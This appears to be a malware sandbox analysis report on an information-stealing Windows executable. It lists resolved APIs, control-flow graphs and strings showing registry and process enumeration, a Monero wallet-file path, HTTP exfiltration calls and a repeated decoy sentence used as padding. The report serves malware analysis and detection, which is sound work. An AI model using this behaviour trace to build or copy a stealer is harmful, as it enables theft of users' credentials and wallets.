15740 6ea7a0 lstrcpy 15739->15740 15742 6ea994 15740->15742 15741->15739 15742->14691 15743->14806 15745 6d9af9 LocalAlloc 15744->15745 15746 6d4eee 15744->15746 15745->15746 15747 6d9b14 CryptStringToBinaryA 15745->15747 15746->14694 15746->14697 15747->15746 15748 6d9b39 LocalFree 15747->15748 15748->15746 15749->15727 15750->14816 15751->14957 15752->14959 15753->14967 15882 6e77a0 15754->15882 15757 6e1c1e 15757->15049 15758 6e76c6 RegOpenKeyExA 15759 6e76e7 RegQueryValueExA 15758->15759 15760 6e7704 RegCloseKey 15758->15760 15759->15760 15760->15757 15762 6e1c99 15761->15762 15762->15063 15764 6e1e09 15763->15764 15764->15105 15766 6e7a9a wsprintfA 15765->15766 15767 6e1e84 15765->15767 15766->15767 15767->15119 15769 6e7b4d 15768->15769 15770 6e1efe 15768->15770 15889 6e8d20 
LocalAlloc CharToOemW 15769->15889 15770->15133 15773 6ea740 lstrcpy 15772->15773 15774 6e7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15773->15774 15781 6e7c25 15774->15781 15775 6e7d18 15777 6e7d1e LocalFree 15775->15777 15778 6e7d28 15775->15778 15776 6e7c46 GetLocaleInfoA 15776->15781 15777->15778 15780 6ea7a0 lstrcpy 15778->15780 15779 6ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15779->15781 15783 6e7d37 15780->15783 15781->15775 15781->15776 15781->15779 15782 6ea8a0 lstrcpy 15781->15782 15782->15781 15783->15146 15785 6e2008 15784->15785 15785->15161 15787 6e94b5 15786->15787 15788 6e9493 GetModuleFileNameExA CloseHandle 15786->15788 15789 6ea740 lstrcpy 15787->15789 15788->15787 15790 6e2091 15789->15790 15790->15176 15792 6e7e68 RegQueryValueExA 15791->15792 15793 6e2119 15791->15793 15794 6e7e8e RegCloseKey 15792->15794 15793->15190 15794->15793 15796 6e7fb9 GetLogicalProcessorInformationEx 15795->15796 15797 6e7fd8 GetLastError 15796->15797 15798 6e8029 15796->15798 15805 6e8022 15797->15805 15807 6e7fe3 15797->15807 15803 6e89f0 2 API calls 15798->15803 15801 6e89f0 2 API calls 15802 6e2194 15801->15802 15802->15204 15804 6e807b 15803->15804 15804->15805 15806 6e8084 wsprintfA 15804->15806 15805->15801 15805->15802 15806->15802 15807->15796 15807->15802 15890 6e89f0 15807->15890 15893 6e8a10 GetProcessHeap RtlAllocateHeap 15807->15893 15809 6e220f 15808->15809 15809->15218 15811 6e89b0 15810->15811 15812 6e814d GlobalMemoryStatusEx 15811->15812 15813 6e8163 __aulldiv 15812->15813 15814 6e819b wsprintfA 15813->15814 15815 6e2289 15814->15815 15815->15232 15817 6e87fb GetProcessHeap RtlAllocateHeap wsprintfA 15816->15817 15819 6ea740 lstrcpy 15817->15819 15820 6e230b 15819->15820 15820->15246 15822 6ea740 lstrcpy 15821->15822 15826 6e8229 15822->15826 15823 6e8263 15825 6ea7a0 lstrcpy 15823->15825 15824 6ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15824->15826 15827 6e82dc 15825->15827 15826->15823 15826->15824 15828 6ea8a0 lstrcpy 15826->15828 
15827->15263 15828->15826 15830 6ea740 lstrcpy 15829->15830 15831 6e835c RegOpenKeyExA 15830->15831 15832 6e83ae 15831->15832 15833 6e83d0 15831->15833 15834 6ea7a0 lstrcpy 15832->15834 15835 6e83f8 RegEnumKeyExA 15833->15835 15836 6e8613 RegCloseKey 15833->15836 15845 6e83bd 15834->15845 15838 6e860e 15835->15838 15839 6e843f wsprintfA RegOpenKeyExA 15835->15839 15837 6ea7a0 lstrcpy 15836->15837 15837->15845 15838->15836 15840 6e8485 RegCloseKey RegCloseKey 15839->15840 15841 6e84c1 RegQueryValueExA 15839->15841 15842 6ea7a0 lstrcpy 15840->15842 15843 6e84fa lstrlen 15841->15843 15844 6e8601 RegCloseKey 15841->15844 15842->15845 15843->15844 15846 6e8510 15843->15846 15844->15838 15845->15289 15847 6ea9b0 4 API calls 15846->15847 15848 6e8527 15847->15848 15849 6ea8a0 lstrcpy 15848->15849 15850 6e8533 15849->15850 15851 6ea9b0 4 API calls 15850->15851 15852 6e8557 15851->15852 15853 6ea8a0 lstrcpy 15852->15853 15854 6e8563 15853->15854 15855 6e856e RegQueryValueExA 15854->15855 15855->15844 15856 6e85a3 15855->15856 15857 6ea9b0 4 API calls 15856->15857 15858 6e85ba 15857->15858 15859 6ea8a0 lstrcpy 15858->15859 15860 6e85c6 15859->15860 15861 6ea9b0 4 API calls 15860->15861 15862 6e85ea 15861->15862 15863 6ea8a0 lstrcpy 15862->15863 15864 6e85f6 15863->15864 15864->15844 15866 6ea740 lstrcpy 15865->15866 15867 6e86bc CreateToolhelp32Snapshot Process32First 15866->15867 15868 6e875d CloseHandle 15867->15868 15869 6e86e8 Process32Next 15867->15869 15870 6ea7a0 lstrcpy 15868->15870 15869->15868 15874 6e86fd 15869->15874 15871 6e8776 15870->15871 15871->15321 15872 6ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15872->15874 15873 6ea8a0 lstrcpy 15873->15874 15874->15869 15874->15872 15874->15873 15876 6ea7a0 lstrcpy 15875->15876 15877 6e51b5 15876->15877 15878 6d1590 lstrcpy 15877->15878 15879 6e51c6 15878->15879 15894 6d5100 15879->15894 15881 6e51cf 15881->15333 15885 6e7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15882->15885 15884 6e76b9 15884->15757 15884->15758 
15886 6e7765 RegQueryValueExA 15885->15886 15887 6e7780 RegCloseKey 15885->15887 15886->15887 15888 6e7793 15887->15888 15888->15884 15889->15770 15891 6e8a0c 15890->15891 15892 6e89f9 GetProcessHeap HeapFree 15890->15892 15891->15807 15892->15891 15893->15807 15895 6ea7a0 lstrcpy 15894->15895 15896 6d5119 15895->15896 15897 6d47b0 2 API calls 15896->15897 15898 6d5125 15897->15898 16054 6e8ea0 15898->16054 15900 6d5184 15901 6d5192 lstrlen 15900->15901 15902 6d51a5 15901->15902 15903 6e8ea0 4 API calls 15902->15903 15904 6d51b6 15903->15904 15905 6ea740 lstrcpy 15904->15905 15906 6d51c9 15905->15906 15907 6ea740 lstrcpy 15906->15907 15908 6d51d6 15907->15908 15909 6ea740 lstrcpy 15908->15909 15910 6d51e3 15909->15910 15911 6ea740 lstrcpy 15910->15911 15912 6d51f0 15911->15912 15913 6ea740 lstrcpy 15912->15913 15914 6d51fd InternetOpenA StrCmpCA 15913->15914 15915 6d522f 15914->15915 15916 6d58c4 InternetCloseHandle 15915->15916 15917 6e8b60 3 API calls 15915->15917 15923 6d58d9 ctype 15916->15923 15918 6d524e 15917->15918 15919 6ea920 3 API calls 15918->15919 15920 6d5261 15919->15920 15921 6ea8a0 lstrcpy 15920->15921 15922 6d526a 15921->15922 15924 6ea9b0 4 API calls 15922->15924 15927 6ea7a0 lstrcpy 15923->15927 15925 6d52ab 15924->15925 15926 6ea920 3 API calls 15925->15926 15928 6d52b2 15926->15928 15935 6d5913 15927->15935 15929 6ea9b0 4 API calls 15928->15929 15930 6d52b9 15929->15930 15931 6ea8a0 lstrcpy 15930->15931 15932 6d52c2 15931->15932 15933 6ea9b0 4 API calls 15932->15933 15934 6d5303 15933->15934 15936 6ea920 3 API calls 15934->15936 15935->15881 15937 6d530a 15936->15937 15938 6ea8a0 lstrcpy 15937->15938 15939 6d5313 15938->15939 15940 6d5329 InternetConnectA 15939->15940 15940->15916 15941 6d5359 HttpOpenRequestA 15940->15941 15943 6d58b7 InternetCloseHandle 15941->15943 15944 6d53b7 15941->15944 15943->15916 15945 6ea9b0 4 API calls 15944->15945 15946 6d53cb 15945->15946 15947 6ea8a0 lstrcpy 15946->15947 15948 6d53d4 15947->15948 15949 6ea920 3 
API calls 15948->15949 15950 6d53f2 15949->15950 15951 6ea8a0 lstrcpy 15950->15951 15952 6d53fb 15951->15952 15953 6ea9b0 4 API calls 15952->15953 15954 6d541a 15953->15954 15955 6ea8a0 lstrcpy 15954->15955 15956 6d5423 15955->15956 15957 6ea9b0 4 API calls 15956->15957 15958 6d5444 15957->15958 15959 6ea8a0 lstrcpy 15958->15959 15960 6d544d 15959->15960 15961 6ea9b0 4 API calls 15960->15961 15962 6d546e 15961->15962 15963 6ea8a0 lstrcpy 15962->15963 16055 6e8ead CryptBinaryToStringA 16054->16055 16056 6e8ea9 16054->16056 16055->16056 16057 6e8ece GetProcessHeap RtlAllocateHeap 16055->16057 16056->15900 16057->16056 16058 6e8ef4 ctype 16057->16058 16059 6e8f05 CryptBinaryToStringA 16058->16059 16059->16056 16063->15336 16306 6d9880 16064->16306 16066 6d98e1 16066->15343 16068 6ea740 lstrcpy 16067->16068 16069 6dfb16 16068->16069 16241 6ea740 lstrcpy 16240->16241 16242 6e0266 16241->16242 16243 6e8de0 2 API calls 16242->16243 16244 6e027b 16243->16244 16245 6ea920 3 API calls 16244->16245 16246 6e028b 16245->16246 16247 6ea8a0 lstrcpy 16246->16247 16248 6e0294 16247->16248 16249 6ea9b0 4 API calls 16248->16249 16250 6e02b8 16249->16250 16307 6d988e 16306->16307 16310 6d6fb0 16307->16310 16309 6d98ad ctype 16309->16066 16313 6d6d40 16310->16313 16314 6d6d59 16313->16314 16315 6d6d63 16313->16315 16314->16309 16315->16314 16327 6d6660 16315->16327 16317 6d6dbe 16317->16314 16333 6d69b0 16317->16333 16319 6d6e2a 16319->16314 16320 6d6ef7 16319->16320 16321 6d6ee6 VirtualFree 16319->16321 16322 6d6f38 16320->16322 16323 6d6f26 FreeLibrary 16320->16323 16326 6d6f41 16320->16326 16321->16320 16325 6e89f0 2 API calls 16322->16325 16323->16320 16324 6e89f0 2 API calls 16324->16314 16325->16326 16326->16314 16326->16324 16332 6d668f VirtualAlloc 16327->16332 16329 6d6730 16330 6d673c 16329->16330 16331 6d6743 VirtualAlloc 16329->16331 16330->16317 16331->16330 16332->16329 16332->16330 16334 6d69c9 16333->16334 16338 6d69d5 16333->16338 16335 6d6a09 LoadLibraryA 16334->16335 
16334->16338 16336 6d6a32 16335->16336 16335->16338 16340 6d6ae0 16336->16340 16343 6e8a10 GetProcessHeap RtlAllocateHeap 16336->16343 16338->16319 16339 6d6ba8 GetProcAddress 16339->16338 16339->16340 16340->16338 16340->16339 16341 6e89f0 2 API calls 16341->16340 16342 6d6a8b 16342->16338 16342->16341 16343->16342

                        Control-flow Graph

                        control_flow_graph 660 6e9860-6e9874 call 6e9750 663 6e987a-6e9a8e call 6e9780 GetProcAddress * 21 660->663 664 6e9a93-6e9af2 LoadLibraryA * 5 660->664 663->664 665 6e9b0d-6e9b14 664->665 666 6e9af4-6e9b08 GetProcAddress 664->666 669 6e9b46-6e9b4d 665->669 670 6e9b16-6e9b41 GetProcAddress * 2 665->670 666->665 671 6e9b4f-6e9b63 GetProcAddress 669->671 672 6e9b68-6e9b6f 669->672 670->669 671->672 673 6e9b89-6e9b90 672->673 674 6e9b71-6e9b84 GetProcAddress 672->674 675 6e9b92-6e9bbc GetProcAddress * 2 673->675 676 6e9bc1-6e9bc2 673->676 674->673 675->676
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,00E42458), ref: 006E98A1
                        • GetProcAddress.KERNEL32(74DD0000,00E42398), ref: 006E98BA
                        • GetProcAddress.KERNEL32(74DD0000,00E42470), ref: 006E98D2
                        • GetProcAddress.KERNEL32(74DD0000,00E422A8), ref: 006E98EA
                        • GetProcAddress.KERNEL32(74DD0000,00E42380), ref: 006E9903
                        • GetProcAddress.KERNEL32(74DD0000,00E48F48), ref: 006E991B
                        • GetProcAddress.KERNEL32(74DD0000,00E35D30), ref: 006E9933
                        • GetProcAddress.KERNEL32(74DD0000,00E35CF0), ref: 006E994C
                        • GetProcAddress.KERNEL32(74DD0000,00E42218), ref: 006E9964
                        • GetProcAddress.KERNEL32(74DD0000,00E42500), ref: 006E997C
                        • GetProcAddress.KERNEL32(74DD0000,00E422C0), ref: 006E9995
                        • GetProcAddress.KERNEL32(74DD0000,00E422D8), ref: 006E99AD
                        • GetProcAddress.KERNEL32(74DD0000,00E35B50), ref: 006E99C5
                        • GetProcAddress.KERNEL32(74DD0000,00E42320), ref: 006E99DE
                        • GetProcAddress.KERNEL32(74DD0000,00E42488), ref: 006E99F6
                        • GetProcAddress.KERNEL32(74DD0000,00E35B70), ref: 006E9A0E
                        • GetProcAddress.KERNEL32(74DD0000,00E42338), ref: 006E9A27
                        • GetProcAddress.KERNEL32(74DD0000,00E423B0), ref: 006E9A3F
                        • GetProcAddress.KERNEL32(74DD0000,00E35D70), ref: 006E9A57
                        • GetProcAddress.KERNEL32(74DD0000,00E423C8), ref: 006E9A70
                        • GetProcAddress.KERNEL32(74DD0000,00E35AB0), ref: 006E9A88
                        • LoadLibraryA.KERNEL32(00E42530,?,006E6A00), ref: 006E9A9A
                        • LoadLibraryA.KERNEL32(00E42560,?,006E6A00), ref: 006E9AAB
                        • LoadLibraryA.KERNEL32(00E425A8,?,006E6A00), ref: 006E9ABD
                        • LoadLibraryA.KERNEL32(00E42590,?,006E6A00), ref: 006E9ACF
                        • LoadLibraryA.KERNEL32(00E42548,?,006E6A00), ref: 006E9AE0
                        • GetProcAddress.KERNEL32(75A70000,00E425D8), ref: 006E9B02
                        • GetProcAddress.KERNEL32(75290000,00E42578), ref: 006E9B23
                        • GetProcAddress.KERNEL32(75290000,00E425C0), ref: 006E9B3B
                        • GetProcAddress.KERNEL32(75BD0000,00E42518), ref: 006E9B5D
                        • GetProcAddress.KERNEL32(75450000,00E35DB0), ref: 006E9B7E
                        • GetProcAddress.KERNEL32(76E90000,00E490F8), ref: 006E9B9F
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 006E9BB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: #$0%$0]$8#$H%$NtQueryInformationProcess$P[$X$$`"$`%$p$$p[$p]$x%
                        • API String ID: 2238633743-152105285
                        • Opcode ID: eccdd903d5d6e37485247c1421ebb1495761d4e36900a794e8594fbcfc61cdae
                        • Instruction ID: f38991995ee26b9a88caaa1157bd9e1ffa770b84d8379292fe290d9ba5d66713
                        • Opcode Fuzzy Hash: eccdd903d5d6e37485247c1421ebb1495761d4e36900a794e8594fbcfc61cdae
                        • Instruction Fuzzy Hash: 96A19EB5B3E2409FD344EFA8EE889E637F9F74C310704C55AA605C32A5D6399D42EB12

                        Control-flow Graph

                        control_flow_graph 764 6d45c0-6d4695 RtlAllocateHeap 781 6d46a0-6d46a6 764->781 782 6d46ac-6d474a 781->782 783 6d474f-6d47a9 VirtualProtect 781->783 782->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 006D479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D46B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D46CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D46AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D45E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D46D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D45DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D45C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D45F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D45D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D46C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006D4657
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 67003c8eb56187b13cfd0defb1b68fd4b48fbdee34b8808e76e7c03d2af51c39
                        • Instruction ID: 0114b5abe20686a843e51c6e1344dab1923c9bbf99c2ba65172ca28926fd27db
                        • Opcode Fuzzy Hash: 67003c8eb56187b13cfd0defb1b68fd4b48fbdee34b8808e76e7c03d2af51c39
                        • Instruction Fuzzy Hash: D14101247C2608EEE634B7A7A867EBD76575FC3708F535040EB4152FA0CEB069807726

                        Control-flow Graph

                        • Graph image not reproduced (legend: Executed / Not Executed); basic blocks 6d4880-6d4fa2, with calls to InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle and lstrlen
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006D4839
                          • Part of subcall function 006D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 006D4849
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006D4915
                        • StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D4ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006F0DDB,00000000,?,?,00000000,?,",00000000,?,00E4EAC8), ref: 006D4DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 006D4E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 006D4E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006D4E49
                        • InternetCloseHandle.WININET(00000000), ref: 006D4EAD
                        • InternetCloseHandle.WININET(00000000), ref: 006D4EC5
                        • HttpOpenRequestA.WININET(00000000,00E4E9F8,?,00E4E248,00000000,00000000,00400100,00000000), ref: 006D4B15
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • InternetCloseHandle.WININET(00000000), ref: 006D4ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------$H$x$
                        • API String ID: 460715078-1516566845
